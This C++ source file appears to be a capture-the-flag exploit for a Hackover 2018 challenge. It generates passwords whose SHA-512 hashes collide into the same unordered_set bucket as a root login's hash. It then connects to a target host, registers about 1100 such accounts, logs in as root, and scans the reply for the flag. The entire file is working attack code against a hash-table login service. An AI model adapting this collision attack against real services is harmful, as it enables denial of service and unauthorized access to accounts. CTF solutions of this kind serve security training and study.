#include <openssl/evp.h>

#include <iostream>
#include <vector>
#include <unordered_set>

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <string.h>

#define EVP_CREATE_FN() EVP_MD_CTX_new()
#define EVP_DESTROY_FN(x) EVP_MD_CTX_free(x)

std::string sha512sum(const std::string& name, const std::string& password) {
	EVP_MD_CTX *mdctx;
	const EVP_MD *md;
	unsigned char md_value[EVP_MAX_MD_SIZE];
	unsigned int md_len;

	mdctx = EVP_CREATE_FN();
	md = EVP_get_digestbyname("sha512");
	EVP_MD_CTX_init(mdctx);
	EVP_DigestInit_ex(mdctx, md, NULL);
	EVP_DigestUpdate(mdctx, name.c_str(), name.size());
	EVP_DigestUpdate(mdctx, password.c_str(), password.size());
	EVP_DigestFinal_ex(mdctx, md_value, &md_len);
	EVP_DESTROY_FN(mdctx);

	return std::string(reinterpret_cast<char*>(md_value), md_len);
}

// https://stackoverflow.com/a/440240/92560
void random_string(char *s, const int len) {
    static const char alphanum[] =
        "0123456789"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz";

    for (int i = 0; i < len; ++i) {
        s[i] = alphanum[rand() % (sizeof(alphanum) - 1)];
    }
}

int main(int argc, char* argv[]) {
	if (argc != 3) {
		std::cerr << "Usage ./a.out <host> <port>\n";
		return 1;
	}

	std::unordered_set<std::string> values;
	values.reserve(15000);

	std::string target_login = sha512sum("root", "foo");
	size_t target_bucket = values.bucket(target_login);

	std::string fake_login = "lava";
	std::vector<std::string> pws;

	std::string pw;
	pw.resize(32);
	while (pws.size() < 1100) {
		random_string(&pw[0], 32);
		std::string sha = sha512sum(fake_login, pw);
		size_t bucket = values.bucket(sha);
		if (bucket == target_bucket) {
			std::cout << '.' << std::flush;
			pws.push_back(pw);
		}
	}

	struct addrinfo* res;
	int error = getaddrinfo(argv[1], argv[2], NULL, &res);

	int s = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
	if (connect(s, res->ai_addr, res->ai_addrlen)) {
		std::cerr << "Error connecting!\n";
	}

	char input[2048];
	read(s, input, sizeof(input));
	std::cout << input << std::endl;

	for (int i=0; i<pws.size(); ++i) {
		std::string x = pws[i];
		std::cout << "(" << i << ") SENDING " << x << std::endl;

		std::string tx = x + "\n";
		write(s, "1\n", 2);
		write(s, "lava\n", 5);
		write(s, tx.c_str(), tx.size()),
		usleep(100000);

		read(s, input, sizeof(input));
		if (strstr(input, "hackover18")) {
			std::cout << "found flag!\n";
			return 0;
		}
	}

	write(s, "2\n", 2);
	write(s, "root\n", 5);
	write(s, "foo\n", 4);
	usleep(100000);

	read(s, input, sizeof(input));
	std::cout << input << std::endl;

	close(s);

	if (strstr(input, "hackover18")) {
		std::cout << "found flag!\n";
		return 0;
	}

	return 1;
}

